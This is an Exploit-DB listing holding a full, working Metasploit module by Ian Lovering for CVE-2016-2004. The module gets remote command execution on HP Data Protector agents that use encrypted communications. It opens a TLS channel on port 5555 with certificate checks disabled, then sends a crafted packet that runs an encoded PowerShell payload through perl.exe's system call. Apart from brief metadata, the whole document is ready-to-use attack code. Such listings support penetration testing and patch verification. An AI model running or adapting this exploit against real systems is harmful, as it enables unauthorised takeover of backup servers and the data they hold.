HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)

EDB-ID:

39874




Platform:

Windows

Date:

2016-05-31


# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
      'Description'    => %q{
        This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Ian Lovering' ],
      'References'     =>
        [
          [ 'CVE', '2016-2004' ],
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'WfsDelay' => 30,
          'RPORT' => 5555
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 18 2016",
      'DefaultTarget'  => 0))
  end

  def check
    # For the check command
    connect
    sock.put(rand_text_alpha_upper(64))
    response = sock.get_once(-1)
    disconnect

    if response.nil?
      return Exploit::CheckCode::Safe
    end

    service_version = Rex::Text.to_ascii(response).chop.chomp

    if service_version =~ /HP Data Protector/
      print_status(service_version)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe

  end

  def generate_dp_payload

    command = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { remove_comspec: true, encode_final_payload: true })

    payload =
      "\x32\x00\x01\x01\x01\x01\x01\x01" +
      "\x00\x01\x00\x01\x00\x01\x00\x01" +
      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
      "\x6d('#{command}')\x00"

    payload_length = [payload.length].pack('N')

    return payload_length + payload
  end

  def exploit
    # Main function
    encryption_init_data =
      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"

    print_status("Initiating connection")

    # Open connection
    connect

    # Send init data
    sock.put(encryption_init_data)
    begin
      buf = sock.get_once
    rescue ::EOFError
    end

    print_status("Establishing encrypted channel")

    # Create TLS / SSL context
    sock.extend(Rex::Socket::SslTcp)
    sock.sslctx  = OpenSSL::SSL::SSLContext.new(:SSLv23)
    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE

    sock.sslctx.options = OpenSSL::SSL::OP_ALL

    # Enable TLS / SSL
    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
    sock.sslsock.connect

    print_status("Sending payload")

    # Send payload
    sock.put(generate_dp_payload(), {timeout: 5})

    # Close socket
    disconnect

    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
  end

end